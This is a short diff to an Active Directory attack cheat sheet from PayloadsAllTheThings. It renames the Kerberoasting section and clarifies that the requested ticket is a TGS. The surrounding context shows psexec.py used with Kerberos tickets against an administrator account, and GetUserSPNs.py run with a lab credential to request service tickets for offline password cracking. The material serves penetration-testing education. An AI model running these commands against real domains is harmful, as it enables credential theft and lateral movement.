swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

 root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
 ```

-### Kerberoast
+### Kerberoasting

 > "A service principal name (SPN) is a unique identifier of a service instance.
 SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)

-Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`.
+Any valid domain user can request a kerberos ticket (TGS) for any domain service with `GetUserSPNs`.
 Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.

 ```powershell
 $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request